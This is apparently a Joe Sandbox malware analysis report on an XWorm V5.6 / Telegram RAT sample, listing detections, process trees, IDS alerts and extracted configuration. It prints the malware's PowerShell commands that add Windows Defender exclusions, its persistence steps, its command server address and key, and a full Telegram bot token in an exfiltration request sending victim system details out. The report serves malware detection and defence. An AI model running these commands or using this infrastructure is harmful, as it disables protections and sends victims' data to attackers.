Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560514
MD5:8d52069bd117da94e0b0b70e73e33fb0
SHA1:e8090adddff167e1bda4194af968ba4bc22a2d60
SHA256:b3e217c467cfe1e8079e82b88f2f99950a9459330a8843070ebb34bf3e2bcf38
Tags:exeuser-Bitsight
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8D52069BD117DA94E0B0B70E73E33FB0)
    • powershell.exe (PID: 7412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\svchost.exe" MD5: 8D52069BD117DA94E0B0B70E73E33FB0)
  • svchost.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Local\svchost.exe" MD5: 8D52069BD117DA94E0B0B70E73E33FB0)
  • cleanup
{"C2 url": ["87.120.112.33"], "Port": 8398, "Aes key": "<213923746>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"C2 url": "https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage"}
SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_XWormYara detected XWormJoe Security
    file.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      file.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x106e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10786:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1089b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xfe13:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
          C:\Users\user\AppData\Local\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\Users\user\AppData\Local\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x106e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x10786:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x1089b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xfe13:$cnc4: POST / HTTP/1.1
            SourceRuleDescriptionAuthorStrings
            00000000.00000002.2950679638.0000000002A23000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000002.2950679638.0000000002A0F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x104e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x10586:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x1069b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xfc13:$cnc4: POST / HTTP/1.1
                  Process Memory Space: file.exe PID: 7312JoeSecurity_XWormYara detected XWormJoe Security
                    Click to see the 1 entries
                    SourceRuleDescriptionAuthorStrings
                    0.0.file.exe.5c0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      0.0.file.exe.5c0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        0.0.file.exe.5c0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0x106e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0x10786:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0x1089b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0xfe13:$cnc4: POST / HTTP/1.1

                        System Summary

                        barindex
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7312, TargetFilename: C:\Users\user\AppData\Local\svchost.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7412, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Local\svchost.exe" , ProcessId: 7480, ProcessName: svchost.exe
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7412, ProcessName: powershell.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7312, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7412, ProcessName: powershell.exe
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7312, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7412, ProcessName: powershell.exe
                        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Local\svchost.exe" , ProcessId: 7480, ProcessName: svchost.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-21T22:21:01.851871+010020283713Unknown Traffic192.168.2.44973520.189.173.21443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-21T22:22:07.016128+010028536851A Network Trojan was detected192.168.2.449749149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-21T22:22:14.748492+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:21.488080+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:28.854472+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:35.196511+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:35.586248+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:42.240444+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:48.648005+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:49.359041+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:49.569088+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:22:55.621654+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:23:01.060097+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:23:06.834762+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        2024-11-21T22:23:07.729313+010028528701Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-21T22:22:21.558331+010028529231Malware Command and Control Activity Detected192.168.2.44975587.120.112.338398TCP
                        2024-11-21T22:22:35.200060+010028529231Malware Command and Control Activity Detected192.168.2.44975587.120.112.338398TCP
                        2024-11-21T22:22:48.649987+010028529231Malware Command and Control Activity Detected192.168.2.44975587.120.112.338398TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-21T22:22:49.569088+010028589241Malware Command and Control Activity Detected87.120.112.338398192.168.2.449755TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: file.exeAvira: detected
                        Source: C:\Users\user\AppData\Local\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: file.exeMalware Configuration Extractor: Xworm {"C2 url": ["87.120.112.33"], "Port": 8398, "Aes key": "<213923746>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                        Source: file.exe.7312.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage"}
                        Source: C:\Users\user\AppData\Local\svchost.exeReversingLabs: Detection: 76%
                        Source: file.exeReversingLabs: Detection: 76%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Local\svchost.exeJoe Sandbox ML: detected
                        Source: file.exeJoe Sandbox ML: detected
                        Source: file.exeString decryptor: 87.120.112.33
                        Source: file.exeString decryptor: 8398
                        Source: file.exeString decryptor: <213923746>
                        Source: file.exeString decryptor: <Xwormmm>
                        Source: file.exeString decryptor: XWorm V5.6
                        Source: file.exeString decryptor: USB.exe
                        Source: file.exeString decryptor: %LocalAppData%
                        Source: file.exeString decryptor: svchost.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.4:49755
                        Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49755 -> 87.120.112.33:8398
                        Source: Network trafficSuricata IDS: 2858924 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 87.120.112.33:8398 -> 192.168.2.4:49755
                        Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49749 -> 149.154.167.220:443
                        Source: Malware configuration extractorURLs: 87.120.112.33
                        Source: unknownDNS query: name: api.telegram.org
                        Source: Yara matchFile source: file.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPED
                        Source: global trafficTCP traffic: 192.168.2.4:49755 -> 87.120.112.33:8398
                        Source: global trafficHTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                        Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 20.189.173.21:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.112.33
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: file.exe, 00000000.00000002.2950679638.0000000002ABD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: powershell.exe, 00000001.00000002.1767227966.0000021FF13B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2289580802.0000022735177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                        Source: powershell.exe, 00000001.00000002.1767227966.0000021FF13B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2289580802.0000022735177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                        Source: powershell.exe, 00000007.00000002.2081462859.000001D6E14B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                        Source: powershell.exe, 00000001.00000002.1768716785.0000021FF1532000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E16BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                        Source: powershell.exe, 00000001.00000002.1770104920.0000021FF16F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mw
                        Source: powershell.exe, 00000001.00000002.1758662678.0000021F90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860676438.000001B6CE7C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2049175145.000001D6D8F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.1741638824.0000021F80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C92C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741638824.0000021F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C8F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271C921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000001.00000002.1741638824.0000021F80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C92C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000001.00000002.1770104920.0000021FF1740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
                        Source: powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000001.00000002.1768900045.0000021FF1621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                        Source: powershell.exe, 00000001.00000002.1741638824.0000021F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C8F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271C921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: file.exe, svchost.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                        Source: file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=14704
